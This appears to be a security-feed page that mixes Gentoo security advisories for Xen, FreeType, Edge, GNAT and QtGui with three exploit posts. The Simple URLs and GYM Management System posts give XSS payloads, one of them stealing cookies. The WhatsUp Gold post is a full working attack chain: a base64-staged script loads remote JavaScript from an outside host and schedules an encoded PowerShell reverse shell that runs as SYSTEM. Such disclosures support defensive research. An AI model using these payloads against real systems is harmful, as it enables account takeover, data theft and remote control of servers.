Gentoo Linux Security Advisory 202402-7 - Multiple vulnerabilities have been found in Xen, the worst of which can lead to arbitrary code execution. Versions greater than or equal to 4.16.6_pre1 are affected.

    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Gentoo Linux Security Advisory                           GLSA 202402-07- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -                                           https://security.gentoo.org/- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High    Title: Xen: Multiple Vulnerabilities     Date: February 04, 2024     Bugs: #754105, #757126, #826998, #837575, #858122, #876790, #879031, #903624, #905389, #915970       ID: 202402-07- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Synopsis========Multiple vulnerabilities have been found in Xen, the worst of which canlead to arbitrary code execution.Background==========Xen is a bare-metal hypervisor.Affected packages=================Package            Vulnerable     Unaffected-----------------  -------------  --------------app-emulation/xen  < 4.16.6_pre1  >= 4.16.6_pre1Description===========Multiple vulnerabilities have been discovered in Xen. Please review theCVE identifiers referenced below for details.Impact======Please review the referenced CVE identifiers for details.Workaround==========There is no known workaround at this time.Resolution==========All Xen users should upgrade to the latest version:  # emerge --sync  # emerge --ask --oneshot --verbose ">=app-emulation/xen-4.16.6_pre1"References==========[ 1 ] CVE-2021-28703      https://nvd.nist.gov/vuln/detail/CVE-2021-28703[ 2 ] CVE-2021-28704      https://nvd.nist.gov/vuln/detail/CVE-2021-28704[ 3 ] CVE-2021-28705      https://nvd.nist.gov/vuln/detail/CVE-2021-28705[ 4 ] CVE-2021-28706      https://nvd.nist.gov/vuln/detail/CVE-2021-28706[ 5 ] CVE-2021-28707      https://nvd.nist.gov/vuln/detail/CVE-2021-28707[ 6 ] CVE-2021-28708      https://nvd.nist.gov/vuln/detail/CVE-2021-28708[ 7 ] CVE-2021-28709      https://nvd.nist.gov/vuln/detail/CVE-2021-28709[ 8 ] CVE-2022-23816      https://nvd.nist.gov/vuln/detail/CVE-2022-23816[ 9 ] CVE-2022-23824      https://nvd.nist.gov/vuln/detail/CVE-2022-23824[ 10 ] CVE-2022-23825      https://nvd.nist.gov/vuln/detail/CVE-2022-23825[ 11 ] CVE-2022-26356      https://nvd.nist.gov/vuln/detail/CVE-2022-26356[ 12 ] CVE-2022-26357      https://nvd.nist.gov/vuln/detail/CVE-2022-26357[ 13 ] CVE-2022-26358      https://nvd.nist.gov/vuln/detail/CVE-2022-26358[ 14 ] CVE-2022-26359      https://nvd.nist.gov/vuln/detail/CVE-2022-26359[ 15 ] CVE-2022-26360      https://nvd.nist.gov/vuln/detail/CVE-2022-26360[ 16 ] CVE-2022-26361      https://nvd.nist.gov/vuln/detail/CVE-2022-26361[ 17 ] CVE-2022-27672      https://nvd.nist.gov/vuln/detail/CVE-2022-27672[ 18 ] CVE-2022-29900      https://nvd.nist.gov/vuln/detail/CVE-2022-29900[ 19 ] CVE-2022-29901      https://nvd.nist.gov/vuln/detail/CVE-2022-29901[ 20 ] CVE-2022-33746      https://nvd.nist.gov/vuln/detail/CVE-2022-33746[ 21 ] CVE-2022-33747      https://nvd.nist.gov/vuln/detail/CVE-2022-33747[ 22 ] CVE-2022-33748      https://nvd.nist.gov/vuln/detail/CVE-2022-33748[ 23 ] CVE-2022-33749      https://nvd.nist.gov/vuln/detail/CVE-2022-33749[ 24 ] CVE-2022-42309      https://nvd.nist.gov/vuln/detail/CVE-2022-42309[ 25 ] CVE-2022-42310      https://nvd.nist.gov/vuln/detail/CVE-2022-42310[ 26 ] CVE-2022-42319      https://nvd.nist.gov/vuln/detail/CVE-2022-42319[ 27 ] CVE-2022-42320      https://nvd.nist.gov/vuln/detail/CVE-2022-42320[ 28 ] CVE-2022-42321      https://nvd.nist.gov/vuln/detail/CVE-2022-42321[ 29 ] CVE-2022-42322      https://nvd.nist.gov/vuln/detail/CVE-2022-42322[ 30 ] CVE-2022-42323      https://nvd.nist.gov/vuln/detail/CVE-2022-42323[ 31 ] CVE-2022-42324      https://nvd.nist.gov/vuln/detail/CVE-2022-42324[ 32 ] CVE-2022-42325      https://nvd.nist.gov/vuln/detail/CVE-2022-42325[ 33 ] CVE-2022-42326      https://nvd.nist.gov/vuln/detail/CVE-2022-42326[ 34 ] CVE-2022-42327      https://nvd.nist.gov/vuln/detail/CVE-2022-42327[ 35 ] CVE-2022-42330      https://nvd.nist.gov/vuln/detail/CVE-2022-42330[ 36 ] CVE-2022-42331      https://nvd.nist.gov/vuln/detail/CVE-2022-42331[ 37 ] CVE-2022-42332      https://nvd.nist.gov/vuln/detail/CVE-2022-42332[ 38 ] CVE-2022-42333      https://nvd.nist.gov/vuln/detail/CVE-2022-42333[ 39 ] CVE-2022-42334      https://nvd.nist.gov/vuln/detail/CVE-2022-42334[ 40 ] CVE-2022-42335      https://nvd.nist.gov/vuln/detail/CVE-2022-42335[ 41 ] XSA-351[ 42 ] XSA-355[ 43 ] XSA-385[ 44 ] XSA-387[ 45 ] XSA-388[ 46 ] XSA-389[ 47 ] XSA-397[ 48 ] XSA-399[ 49 ] XSA-400[ 50 ] XSA-407[ 51 ] XSA-412[ 52 ] XSA-414[ 53 ] XSA-415[ 54 ] XSA-416[ 55 ] XSA-417[ 56 ] XSA-418[ 57 ] XSA-419[ 58 ] XSA-420[ 59 ] XSA-421[ 60 ] XSA-422[ 61 ] XSA-425[ 62 ] XSA-430Availability============This GLSA and any updates to it are available for viewing atthe Gentoo Security Website: https://security.gentoo.org/glsa/202402-07Concerns?=========Security is a primary focus of Gentoo Linux and ensuring theconfidentiality and security of our users' machines is of utmostimportance to us. Any security concerns should be addressed tosecurity@gentoo.org or alternatively, you may file a bug athttps://bugs.gentoo.org.License=======Copyright 2024 Gentoo Foundation, Inc; referenced textbelongs to its owner(s).The contents of this document are licensed under theCreative Commons - Attribution / Share Alike license.https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-07

WordPress Simple URLs plugin versions prior to 115 suffer from a cross site scripting vulnerability.

    # Exploit Title: simple urls < 115  XSS# Google Dork:# Exploit Author: AmirZargham# Vendor Homepage: https://getlasso.co/# Software Link: https://wordpress.org/plugins/simple-urls/# Version: < 115# Tested on: firefox,chrome# CVE: CVE-2023-0099# CWE: CWE-79# Platform: MULTIPLE# Type: WebAppsDescriptionThe Simple URLs WordPress plugin before 115 does not sanitise and escapesome parameters before outputting them back in some pages, leading toReflected Cross-Site Scripting.Usage Info:send malicious link to victim:https://vulnerable.com/wp-content/plugins/simple-urls/admin/assets/js/import-js.php?search=<script>alert(origin)</script>

WordPress Simple URLs Cross Site Scripting

Gentoo Linux Security Advisory 202402-6 - Multiple vulnerabilities have been discovered in FreeType, the worst of which can lead to remote code execution. Versions greater than or equal to 2.13.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-06  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: FreeType: Multiple Vulnerabilities  
     Date: February 03, 2024  
     Bugs: #840224, #881443  
       ID: 202402-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in FreeType, the worst of  
which can lead to remote code execution.

Background  
==========

FreeType is a high-quality and portable font engine.

Affected packages  
=================

Package              Vulnerable    Unaffected  
-------------------  ------------  ------------  
media-libs/freetype  < 2.13.0      >= 2.13.0

Description  
===========

Multiple vulnerabilities have been discovered in FreeType. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All FreeType users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-libs/freetype-2.13.0"

References  
==========

[ 1 ] CVE-2022-27404  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27404  
[ 2 ] CVE-2022-27405  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27405  
[ 3 ] CVE-2022-27406  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27406  
[ 4 ] CVE-2023-2004  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2004

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-06

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-06

Gym Management System version 1.0 suffers from a persistent cross site scripting vulnerability. Original credit for this finding goes to Jyotsna Adhana in October of 2020 but uses a different vector of attack for this software version.

    # Exploit Title: GYM MS - GYM Management System - Cross Site Scripting (Stored)# Date: 29/09/2023# Vendor Homepage: https://phpgurukul.com/gym-management-system-using-php-and-mysql/# Software Link: https://phpgurukul.com/projects/GYM-Management-System-using-PHP.zip# Version: 1.0# Last Update: 31 August 2022# Tested On: Kali Linux 6.1.27-1kali1 (2023-05-12) x86_64 + XAMPP 7.4.30# 1: Create user, login and go to profile.php# 2: Use payload x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22 in lname field.# 3: When entering the profile.php page, document.cookie will be reflected every time.# AuthorThis vulnerability was detected by Alperen Yozgat while testing with the Rapplex - Web Application Security Scanner.# About RapplexRapplex is a web applicaton security scanner that scans and reports vulnerabilities in websites.Pentesters can use it as an automation tool for daily tasks but "Pentester Studio" will provide such a great addition as well in their manual assessments.So, the software does not need separate development tools to discover different types of vulnerabilities or to develop existing engines. "Exploit" tools are available to take advantage of vulnerabilities such as SQL Injection, Code Injection, Fle Incluson.# HTTP Request POST /gym/profile.php HTTP/1.1Host: localhostContent-Length: 129Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Cookie: PHPSESSID=76e2048c174c1a5d46e203df87672c25 #CHANGEConnection: closefname=test&lname=x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22&email=john%40test.com&mobile=1425635241&state=Delhi&city=New+Delhi&address=ABC+Street+XYZ+Colony&submit=Update

GYM MS 1.0 Cross Site Scripting

Gentoo Linux Security Advisory 202402-5 - Multiple vulnerabilities have been discovered in Microsoft Edge, the worst of which could lead to remote code execution. Versions greater than or equal to 120.0.2210.61 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-05  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Microsoft Edge: Multiple Vulnerabilities  
     Date: February 03, 2024  
     Bugs: #907817, #908518, #918586, #919495  
       ID: 202402-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Microsoft Edge, the  
worst of which could lead to remote code execution.

Background  
==========

Microsoft Edge is a browser that combines a minimal design with  
sophisticated technology to make the web faster, safer, and easier.

Affected packages  
=================

Package                    Vulnerable       Unaffected  
-------------------------  ---------------  ----------------  
www-client/microsoft-edge  < 120.0.2210.61  >= 120.0.2210.61

Description  
===========

Multiple vulnerabilities have been discovered in Microsoft Edge. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Microsoft Edge users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/microsoft-edge-120.0.2210.61"

References  
==========

[ 1 ] CVE-2023-29345  
      https://nvd.nist.gov/vuln/detail/CVE-2023-29345  
[ 2 ] CVE-2023-33143  
      https://nvd.nist.gov/vuln/detail/CVE-2023-33143  
[ 3 ] CVE-2023-33145  
      https://nvd.nist.gov/vuln/detail/CVE-2023-33145  
[ 4 ] CVE-2023-35618  
      https://nvd.nist.gov/vuln/detail/CVE-2023-35618  
[ 5 ] CVE-2023-36022  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36022  
[ 6 ] CVE-2023-36029  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36029  
[ 7 ] CVE-2023-36034  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36034  
[ 8 ] CVE-2023-36409  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36409  
[ 9 ] CVE-2023-36559  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36559  
[ 10 ] CVE-2023-36562  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36562  
[ 11 ] CVE-2023-36727  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36727  
[ 12 ] CVE-2023-36735  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36735  
[ 13 ] CVE-2023-36741  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36741  
[ 14 ] CVE-2023-36787  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36787  
[ 15 ] CVE-2023-36880  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36880  
[ 16 ] CVE-2023-38174  
      https://nvd.nist.gov/vuln/detail/CVE-2023-38174

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-05

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-05

Gentoo Linux Security Advisory 202402-4 - A vulnerability has been discovered in GNAT Ada Suite which can lead to remote code execution. Versions prior to 2019-r2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-04  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: GNAT Ada Suite: Remote Code Execution  
     Date: February 03, 2024  
     Bugs: #787440  
       ID: 202402-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in GNAT Ada Suite which can lead to  
remote code execution.

Background  
==========

The GNAT Ada Suite is an Ada development environment.

Affected packages  
=================

Package                 Vulnerable    Unaffected  
----------------------  ------------  ------------  
dev-ada/gnat-suite-bin  < 2019-r2     Vulnerable!

Description  
===========

A vulnerability has been discovered in GNAT Ada Suite. Please review the  
CVE identifier referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

Gentoo has discontinued support for GNAT Ada Suite. We recommend that  
users unmerge it:

  # emerge --ask --depclean "dev-ada/gnat-suite-bin"

References  
==========

[ 1 ] CVE-2020-27619  
      https://nvd.nist.gov/vuln/detail/CVE-2020-27619

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-04

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-04

WhatsUp Gold 2022 version 22.1.0 Build 39 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WhatsUpGold 22.1.0 - Stored Cross-Site Scripting (XSS)# Date: April 18, 2023# Exploit Author: Andreas Finstad (4ndr34z)# Vendor Homepage: https://www.whatsupgold.com# Version: v.22.1.0 Build 39# Tested on: Windows 2022 Server# CVE : CVE-2023-35759# Reference: https://nvd.nist.gov/vuln/detail/CVE-2023-35759WhatsUp Gold 2022 (22.1.0 Build 39) Stored XSS in sysName SNMP parameter.Vulnerability Report: Stored XSS in WhatsUp Gold 2022 (22.1.0 Build 39)Product Name: WhatsUp Gold 2022Version: 22.1.0 Build 39Vulnerability Type: Stored Cross-Site Scripting (XSS)Description:WhatsUp Gold 2022 is vulnerable to a stored cross-site scripting (XSS) attack that allows an attacker to inject malicious scripts into the admin console. The vulnerability exists in the sysName SNMP field on a device, which reflects the input from the SNMP device into the admin console after being discovered by SNMP. An attacker can exploit this vulnerability by crafting a specially crafted SNMP device name that contains malicious code. Once the device name is saved and reflected in the admin console, the injected code will execute in the context of the admin user, potentially allowing the attacker to steal sensitive data or perform unauthorized actions.As there is no CSRF tokens or CDP, it is trivial to create a javascript payload that adds an scheduled action on the server, that executes code as "NT System". In my POC code, I add a Powershell revshell that connects out to the attacker every 5 minutes. (screenshot3)The XSS trigger when clicking the "All names and addresses"Stage:Base64 encoded id property:var a=document.createElement("script");a.src="https://f20.be/t.js";document.body.appendChild(a);Staged payload placed in the SNMP sysName Field on a device:<img id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZjIwLmJlL3QuanMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7Cg== src=https://f20.be/1 onload=eval(atob(this.id))>payload:var vhost = window.location.protocol+'\/\/'+window.location.hostaddaction();async function addaction() {var arguments = ''let run = fetch(vhost+'/NmConsole/api/core/WugPowerShellScriptAction?_dc=1655327281064',{    method: 'POST',    headers: {        'Connection': 'close',        'Content-Length': '1902',        'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"',        'Accept': 'application/json',        'Content-Type': 'application/json',        'X-Requested-With': 'XMLHttpRequest',        'sec-ch-ua-mobile': '?0',        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',        'sec-ch-ua-platform': '"macOS"',        'Sec-Fetch-Mode': 'cors',        'Sec-Fetch-Dest': 'empty',        'Accept-Encoding': 'gzip, deflate',        'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'    },    credentials: 'include',    body: '{"id":-1,"Timeout":30,"ScriptText":"Start-process powershell -argumentlist \\"-W Hidden -noprofile -executionpolicy bypass -NoExit -e JAB0AG0AcAAgAD0AIABAACgAJwBzAFkAUwB0AGUATQAuAG4ARQB0AC4AcwBPAGMAJwAsACcASwBFAHQAcwAuAHQAQwBQAEMAbABJAGUAbgB0ACcAKQA7ACQAdABtAHAAMgAgAD0AIABbAFMAdAByAGkAbgBnAF0AOgA6AEoAbwBpAG4AKAAnACcALAAkAHQAbQBwACkAOwAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAkAHQAbQBwADIAKAAnADEAOQAyAC4AMQA2ADgALgAxADYALgAzADUAJwAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACgAJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQApACAAKwAgACcAQAAnACAAKwAgACgAJABlAG4AdgA6AFUAcwBlAHIARABvAG0AYQBpAG4AKQAgACsAIAAoAFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATgBlAHcATABpAG4AZQApACAAKwAgACgAZwBlAHQALQBsAG8AYwBhAHQAaQBvAG4AKQArACcAPgAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==\\" -NoNewWindow","ScriptImpersonateFlag":false,"ClsId":"5903a09a-cce6-11e0-8f66-fe544824019b","Description":"Evil script","Name":"Systemtask"}'});setTimeout(() => { getactions(); }, 1000);};async function getactions() {const response = await fetch(vhost+'/NmConsole/api/core/WugAction?_dc=4',{    method: 'GET',    headers: {        'Connection': 'close',         'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"',         'Accept': 'application/json',         'Content-Type': 'application/json',         'X-Requested-With': 'XMLHttpRequest',         'sec-ch-ua-mobile': '?0',         'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',         'sec-ch-ua-platform': '"macOS"',         'Sec-Fetch-Site': 'same-origin',         'Sec-Fetch-Mode': 'cors',         'Sec-Fetch-Dest': 'empty',         'Accept-Encoding': 'gzip, deflate',         'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'    },    credentials: 'include'   });const actions = await response.json();var results = [];var searchField = "Name";var searchVal = "Systemtask";for (var i=0 ; i < actions.length ; i++){    if (actions[i][searchField] == searchVal) {        results.push(actions[i].Id);        revshell(results[0])           }}//console.log(actions);};async function revshell(ID) {fetch(vhost+'/NmConsole/Configuration/DlgRecurringActionLibrary/DlgSchedule/DlgSchedule.asp',{    method: 'POST',    headers: {        'Connection': 'close',        'Content-Length': '2442',        'Cache-Control': 'max-age=0',        'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"',        'sec-ch-ua-mobile': '?0',        'sec-ch-ua-platform': '"macOS"',        'Upgrade-Insecure-Requests': '1',        'Origin': 'https://192.168.16.100',        'Content-Type': 'application/x-www-form-urlencoded',        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',        'Sec-Fetch-Site': 'same-origin',        'Sec-Fetch-Mode': 'navigate',        'Sec-Fetch-User': '?1',        'Sec-Fetch-Dest': 'iframe',        'Referer': 'https://192.168.16.100/NmConsole/Configuration/DlgRecurringActionLibrary/DlgSchedule/DlgSchedule.asp',        'Accept-Encoding': 'gzip, deflate',        'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'    },    credentials: 'include',    body: 'DlgSchedule.oCheckBoxEnableSchedule=on&DlgSchedule.ScheduleType=DlgSchedule.oRadioButtonInterval&DlgSchedule.oEditIntervalMinutes=5&ShowAspFormDialog.VISITEDFORM=visited&DlgRecurringActionGeneral.oEditName=test&DlgRecurringActionGeneral.oComboSelectActionType=21&DlgRecurringActionGeneral.DIALOGRETURNURL=%2FNmConsole%2F%24Nm%2FCore%2FForm-AspForms%2Finc%2FShowAspFormDialog.asp&DlgRecurringActionGeneral.SAVEDFORMSTATE=%253cSavedFormState%253e%253cFormVariables%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQueryStringVariables%2F%253e%253c%2FSavedFormState%253e&DlgRecurringActionGeneral.VISITEDFORM=visited%2C+visited&DlgSchedule.DIALOGRETURNURL=%2FNmConsole%2F%24Nm%2FCore%2FForm-AspForms%2Finc%2FShowAspFormDialog.asp&DlgSchedule.SAVEDFORMSTATE=%253cSavedFormState%253e%253cFormVariables%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQueryStringVariables%2F%253e%253c%2FSavedFormState%253e&__EVENTTYPE=ButtonPressed&__EVENTTARGET=DlgSchedule.oButtonFinish&__EVENTARGUMENT=&DlgSchedule.VISITEDFORM=visited&__SOURCEFORM=DlgSchedule&__VIEWSTATE=%253cViewState%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.RecurringAction-sMode%2522%2520sValue%3D%2522new%2522%2F%253e%253coElement%2520sName%3D%2522RecurringAction-nActionTypeID%2522%2520sValue%3D%2522'+ID+'%2522%2F%253e%253coElement%2520sName%3D%2522Date_nStartOfWeek%2522%2520sValue%3D%25220%2522%2F%253e%253coElement%2520sName%3D%2522Date_sMediumDateFormat%2522%2520sValue%3D%2522MMMM%2520dd%2C%2520yyyy%2522%2F%253e%253coElement%2520sName%3D%2522DlgSchedule.sWebUserName%2522%2520sValue%3D%2522admin%2522%2F%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.sWebUserName%2522%2520sValue%3D%2522admin%2522%2F%253e%253coElement%2520sName%3D%2522DlgSchedule.RecurringAction-sMode%2522%2520sValue%3D%2522new%2522%2F%253e%253coElement%2520sName%3D%2522RecurringAction-sName%2522%2520sValue%3D%2522test%2522%2F%253e%253coElement%2520sName%3D%2522Date_bIs24HourTime%2522%2520sValue%3D%25220%2522%2F%253e%253c%2FViewState%253e%0D%0A&DlgSchedule.oEditDay=&DlgSchedule.oComboSelectMonthHour=0&DlgSchedule.oComboSelectMonthMinute=0&DlgSchedule.oComboSelectMonthAmPm=0&DlgSchedule.oComboSelectWeekHour=0&DlgSchedule.oComboSelectWeekMinute=0&DlgSchedule.oComboSelectWeekAmPm=0'});};

WhatsUp Gold 2022 22.1.0 Build 39 Cross Site Scripting

Gentoo Linux Security Advisory 202402-3 - Multiple vulnerabilities have been discovered in QtGui which can lead to remote code execution. Versions greater than or equal to 5.15.9-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-03  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: QtGui: Multiple Vulnerabilities  
     Date: February 03, 2024  
     Bugs: #808531, #907119  
       ID: 202402-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in QtGui which can lead to  
remote code execution.

Background  
==========

QtGui is a module for the Qt toolkit.

Affected packages  
=================

Package       Vulnerable    Unaffected  
------------  ------------  ------------  
dev-qt/qtgui  < 5.15.9-r1   >= 5.15.9-r1

Description  
===========

Multiple vulnerabilities have been discovered in QtGui. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All QtGui users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-qt/qtgui-5.15.9-r1"

References  
==========

[ 1 ] CVE-2021-38593  
      https://nvd.nist.gov/vuln/detail/CVE-2021-38593  
[ 2 ] CVE-2023-32763  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32763

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-03

Concerns?  
=========

